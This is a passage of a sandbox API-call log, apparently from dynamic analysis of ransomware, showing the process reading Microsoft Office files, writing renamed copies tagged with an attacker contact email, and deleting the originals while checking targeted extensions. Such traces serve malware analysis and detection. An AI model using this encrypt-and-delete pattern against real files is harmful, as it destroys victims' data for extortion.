lpNewFilePointer=0x0) returned 1 [0059.662] SetEndOfFile (hFile=0x368) returned 1 [0059.662] CloseHandle (hObject=0x368) returned 1 [0059.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 1 [0059.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.670] lstrlenW (lpString=".doc") returned 4 [0059.670] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString=".docx") returned 5 [0059.670] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.670] lstrlenW (lpString=".pdf") returned 4 [0059.670] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString=".xls") returned 4 [0059.670] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString=".xlsx") returned 5 [0059.670] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.670] lstrlenW (lpString=".ppt") returned 4 [0059.670] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.670] lstrlenW (lpString=".zip") returned 4 [0059.670] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.670] lstrlenW (lpString=".rar") returned 4 [0059.670] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString=".bz2") returned 4 [0059.670] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString=".7z") returned 3 [0059.670] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.670] lstrlenW (lpString=".dbf") returned 4 [0059.670] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.670] lstrlenW (lpString=".1cd") returned 4 [0059.670] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.670] lstrlenW (lpString=".jpg") returned 4 [0059.670] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.671] lstrlenW (lpString=".doc") returned 4 [0059.671] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString=".docx") returned 5 [0059.671] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.671] lstrlenW (lpString=".pdf") returned 4 [0059.671] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString=".xls") returned 4 [0059.671] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString=".xlsx") returned 5 [0059.671] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.671] lstrlenW (lpString=".ppt") returned 4 [0059.671] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.671] lstrlenW (lpString=".zip") returned 4 [0059.671] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.671] lstrlenW (lpString=".rar") returned 4 [0059.671] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString=".bz2") returned 4 [0059.671] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString=".7z") returned 3 [0059.671] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.671] lstrlenW (lpString=".dbf") returned 4 [0059.671] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.671] lstrlenW (lpString=".1cd") returned 4 [0059.671] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0059.671] lstrlenW (lpString=".jpg") returned 4 [0059.671] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.671] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.672] lstrlenW (lpString="AppXManifestLoc.en-us.xml") returned 25 [0059.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.672] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=9831) returned 1 [0059.672] CloseHandle (hObject=0x368) returned 1 [0059.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml")) returned 0x220 [0059.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.672] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.672] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.673] GetLastError () returned 0x0 [0059.673] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2667, lpOverlapped=0x0) returned 1 [0059.737] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2670, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2670, lpOverlapped=0x0) returned 1 [0059.738] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0059.738] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x106, lpOverlapped=0x0) returned 1 [0059.738] SetEndOfFile (hFile=0x344) returned 1 [0059.738] CloseHandle (hObject=0x344) returned 1 [0059.739] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.739] SetEndOfFile (hFile=0x368) returned 1 [0059.740] CloseHandle (hObject=0x368) returned 1 [0059.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.740] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.en-us.xml")) returned 1 [0059.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.740] lstrlenW (lpString=".doc") returned 4 [0059.740] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.740] lstrlenW (lpString=".docx") returned 5 [0059.740] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0059.740] lstrlenW (lpString=".pdf") returned 4 [0059.740] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.740] lstrlenW (lpString=".xls") returned 4 [0059.741] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString=".xlsx") returned 5 [0059.741] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0059.741] lstrlenW (lpString=".ppt") returned 4 [0059.741] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.741] lstrlenW (lpString=".zip") returned 4 [0059.741] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.741] lstrlenW (lpString=".rar") returned 4 [0059.741] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString=".bz2") returned 4 [0059.741] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString=".7z") returned 3 [0059.741] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.741] lstrlenW (lpString=".dbf") returned 4 [0059.741] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.741] lstrlenW (lpString=".1cd") returned 4 [0059.741] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.741] lstrlenW (lpString=".jpg") returned 4 [0059.741] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.741] lstrlenW (lpString=".doc") returned 4 [0059.741] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString=".docx") returned 5 [0059.741] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0059.741] lstrlenW (lpString=".pdf") returned 4 [0059.741] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString=".xls") returned 4 [0059.741] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString=".xlsx") returned 5 [0059.741] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0059.741] lstrlenW (lpString=".ppt") returned 4 [0059.741] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.742] lstrlenW (lpString=".zip") returned 4 [0059.742] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.742] lstrlenW (lpString=".rar") returned 4 [0059.742] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.742] lstrlenW (lpString=".bz2") returned 4 [0059.742] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.742] lstrlenW (lpString=".7z") returned 3 [0059.742] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.742] lstrlenW (lpString=".dbf") returned 4 [0059.742] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.742] lstrlenW (lpString=".1cd") returned 4 [0059.742] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.en-us.xml") returned 76 [0059.742] lstrlenW (lpString=".jpg") returned 4 [0059.742] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.742] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0059.742] lstrlenW (lpString="AG00004_.GIF") returned 12 [0059.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.745] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=9024) returned 1 [0059.745] CloseHandle (hObject=0x368) returned 1 [0059.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 0x220 [0059.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0059.745] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.745] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0059.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.746] GetLastError () returned 0x0 [0059.746] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2340, lpOverlapped=0x0) returned 1 [0060.100] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2350, lpOverlapped=0x0) returned 1 [0060.101] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.101] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.101] SetEndOfFile (hFile=0x344) returned 1 [0060.102] CloseHandle (hObject=0x344) returned 1 [0060.102] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.103] SetEndOfFile (hFile=0x368) returned 1 [0060.103] CloseHandle (hObject=0x368) returned 1 [0060.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0060.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.104] lstrlenW (lpString=".doc") returned 4 [0060.104] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.104] lstrlenW (lpString=".docx") returned 5 [0060.104] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.104] lstrlenW (lpString=".pdf") returned 4 [0060.104] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.104] lstrlenW (lpString=".xls") returned 4 [0060.104] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.104] lstrlenW (lpString=".xlsx") returned 5 [0060.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.104] lstrlenW (lpString=".ppt") returned 4 [0060.104] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.104] lstrlenW (lpString=".zip") returned 4 [0060.104] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.104] lstrlenW (lpString=".rar") returned 4 [0060.104] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.104] lstrlenW (lpString=".bz2") returned 4 [0060.104] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.104] lstrlenW (lpString=".7z") returned 3 [0060.104] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".dbf") returned 4 [0060.105] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".1cd") returned 4 [0060.105] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".jpg") returned 4 [0060.105] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".doc") returned 4 [0060.105] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.105] lstrlenW (lpString=".docx") returned 5 [0060.105] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.105] lstrlenW (lpString=".pdf") returned 4 [0060.105] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.105] lstrlenW (lpString=".xls") returned 4 [0060.105] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.105] lstrlenW (lpString=".xlsx") returned 5 [0060.105] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.105] lstrlenW (lpString=".ppt") returned 4 [0060.105] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".zip") returned 4 [0060.105] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.105] lstrlenW (lpString=".rar") returned 4 [0060.105] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.105] lstrlenW (lpString=".bz2") returned 4 [0060.105] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.105] lstrlenW (lpString=".7z") returned 3 [0060.105] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".dbf") returned 4 [0060.105] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.105] lstrlenW (lpString=".1cd") returned 4 [0060.106] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0060.106] lstrlenW (lpString=".jpg") returned 4 [0060.106] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.106] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.106] lstrlenW (lpString="AG00021_.GIF") returned 12 [0060.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.106] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=14873) returned 1 [0060.106] CloseHandle (hObject=0x368) returned 1 [0060.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif")) returned 0x220 [0060.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.107] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.107] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0060.107] GetLastError () returned 0x0 [0060.107] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3a19, lpOverlapped=0x0) returned 1 [0060.115] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3a20, lpOverlapped=0x0) returned 1 [0060.116] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0060.116] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0060.116] SetEndOfFile (hFile=0x344) returned 1 [0060.116] CloseHandle (hObject=0x344) returned 1 [0060.117] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0060.117] SetEndOfFile (hFile=0x368) returned 1 [0060.118] CloseHandle (hObject=0x368) returned 1 [0060.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 